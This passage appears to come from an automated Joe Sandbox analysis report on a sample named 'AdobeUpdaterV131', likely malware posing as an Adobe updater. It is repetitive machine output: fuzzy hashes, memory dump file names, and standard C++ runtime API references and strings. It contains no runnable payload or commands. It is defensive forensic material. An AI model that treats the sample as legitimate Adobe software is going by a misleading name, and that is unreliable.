                                      • Opcode Fuzzy Hash: 7775860cce46587a2d2b5316939500113ab393172fd34712505d2e9bfb515b53
                                      • Instruction Fuzzy Hash: 72624AB0E002159BDB14DF59C5846ADBBF2EF8A308F2881ADD815AB352C776DD46CF90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec62d9f9e60a498177c9266573c36538cf5bf24a49698e4c14e9b5ad024ffef5
                                      • Instruction ID: 831f63d8d482f7f05ef10a04d57deca3f484070bfff3831a31dce2375ef9b2aa
                                      • Opcode Fuzzy Hash: ec62d9f9e60a498177c9266573c36538cf5bf24a49698e4c14e9b5ad024ffef5
                                      • Instruction Fuzzy Hash: 71C1DE30A00A46CEDBA4CF68C98467ABBF1BB15310F144B59D5D29B6D2CF39AD45CB22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23b3c39ce83e0f13b29bd4e7abed4ecb9d5f81751daf7d657111e10801f66d66
                                      • Instruction ID: 1c5bf1e4dc0fb16ab5488fd3ac59a61b9d7d689367b82a95566d6ebbc6254968
                                      • Opcode Fuzzy Hash: 23b3c39ce83e0f13b29bd4e7abed4ecb9d5f81751daf7d657111e10801f66d66
                                      • Instruction Fuzzy Hash: 17B106755407058BDB399BACCC82AF7B3A9EF54308F54452DE983865C0EBB8A9C5CB10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5d85e2be7d497af9293ae54c4cb74408932a467f6efa198027e8c743e0580e0e
                                      • Instruction ID: 13615db9d0950f3dd5a5001f91f517a02ad2fd28e611325dc6d324e9b4f5d775
                                      • Opcode Fuzzy Hash: 5d85e2be7d497af9293ae54c4cb74408932a467f6efa198027e8c743e0580e0e
                                      • Instruction Fuzzy Hash: 007118B1D006669FDB11CF59E8A07FEBBB6EB1A300F444268D85597793C3389906CBA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c903e57d3163de47897f9bac666de0524c869772cbf535e0b6ea59eb20b9986
                                      • Instruction ID: ca23c3cf4ea656b7e52325a75ba1b6fdca77c4245b4cd4c34844fa6a492b11cb
                                      • Opcode Fuzzy Hash: 8c903e57d3163de47897f9bac666de0524c869772cbf535e0b6ea59eb20b9986
                                      • Instruction Fuzzy Hash: A661B8712202694FE788CF5EECD0476B352E38A312385C619FA81C7395C93DF926D7A5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a1698be895e83f5f95fae71bab9cb0c2a1935dded74b31f29cbcc53648b6bca
                                      • Instruction ID: 078eae304f04f065d11080145d48f78085cd7e594df72e6f082bd1dda534b083
                                      • Opcode Fuzzy Hash: 4a1698be895e83f5f95fae71bab9cb0c2a1935dded74b31f29cbcc53648b6bca
                                      • Instruction Fuzzy Hash: A6519071D002099FCB04DFA8D942BEEFBB5EF49710F108269E811B7350DB75AA448BE4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b1a39ab25d0d454e6b1ca2585699965b33fcd08934163f1a489e990b40201b04
                                      • Instruction ID: 737d2aa1d93dfc431b731b5a0f0e6a6c7d57f07724d29045428d727c3b74b86b
                                      • Opcode Fuzzy Hash: b1a39ab25d0d454e6b1ca2585699965b33fcd08934163f1a489e990b40201b04
                                      • Instruction Fuzzy Hash: 1F518172E00119EFDF04CF98C841AEEBBF6FF88300F598559E915AB241C7389A40CB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction ID: 940bb6a2a48cef5b1b51c572828d890dc9b6ccd99de5001c348d2f3fbed9ea09
                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction Fuzzy Hash: C011577720008AC3D614CB2DD8B46F7A797EFC632172D83BAD25E4B76CD623A9459A00
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0068A143
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0068A165
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0068A185
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0068A1AF
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0068A21D
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0068A269
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0068A283
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0068A318
                                      • std::_Facet_Register.LIBCPMT ref: 0068A325
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                      • String ID: bad locale name
                                      • API String ID: 3375549084-1405518554
                                      • Opcode ID: cd2eba86e063f3e0f7bbbee3b122c13ab33305eebb314c799757b74295b61bf6
                                      • Instruction ID: 3ab1107c0338bb8582acde52b6c3b9363e59d4e2785117d195aa2820392a2ebe
                                      • Opcode Fuzzy Hash: cd2eba86e063f3e0f7bbbee3b122c13ab33305eebb314c799757b74295b61bf6
                                      • Instruction Fuzzy Hash: 4B616FB1D00248DBEB10EFE4D849BEEBBB6AF04350F184219E845A7341E779E945CB96
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 006237E9
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00623835
                                      • __Getctype.LIBCPMT ref: 0062384E
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0062386A
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 006238FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                      • String ID: 0:b$bad locale name
                                      • API String ID: 1840309910-1852626136
                                      • Opcode ID: 6250ba05992089c98f8029e6fe15a817274a1683b1b62c4714e89bb5b5ceed90
                                      • Instruction ID: e23c75da239e8cabcad234f78db69b4c75b14ae88fd73b8bfaffbcbb0bb89f1b
                                      • Opcode Fuzzy Hash: 6250ba05992089c98f8029e6fe15a817274a1683b1b62c4714e89bb5b5ceed90
                                      • Instruction Fuzzy Hash: 635151F1D00799EBDB10DFE8D84579EFBB9AF14310F144129E904AB381E779AA44CB92
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 006FFB67
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 006FFB6F
                                      • _ValidateLocalCookies.LIBCMT ref: 006FFBF8
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 006FFC23
                                      • _ValidateLocalCookies.LIBCMT ref: 006FFC78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 5603aa3f03cabf14044b0a336324202d44f4ef9e46fc443589f16d695d209193
                                      • Instruction ID: d9ed9ebd4a97f848b3e172923ed5be7d4a5b138913bbdc0d944242c5895e853a
                                      • Opcode Fuzzy Hash: 5603aa3f03cabf14044b0a336324202d44f4ef9e46fc443589f16d695d209193
                                      • Instruction Fuzzy Hash: D241C270A0021CDBCF10DF68C884AEE7BB6AF05324F248165ED089B392D775EA46CB91
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00688903
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00688926
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00688946
                                      • std::_Facet_Register.LIBCPMT ref: 006889BB
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 006889D3
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 006889EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                      • String ID:
                                      • API String ID: 2081738530-0
                                      • Opcode ID: 9e0309a7a1178e8331666ac25f86df0d82361141f63ff9f79f9c76c97a06cb32
                                      • Instruction ID: db19251b2dbc7bc47da5c62b6ca684c7dd9a632c258c2ed5b0525f4744256fde
                                      • Opcode Fuzzy Hash: 9e0309a7a1178e8331666ac25f86df0d82361141f63ff9f79f9c76c97a06cb32
                                      • Instruction Fuzzy Hash: 9841FF719002199FCF10EF98DC41ABABBB6FB04324F104359E919AB351EB34AE40CBD6
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006260F2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0062617F
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00626248
                                      Strings
                                      • recursive_directory_iterator::operator++, xrefs: 006261CC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
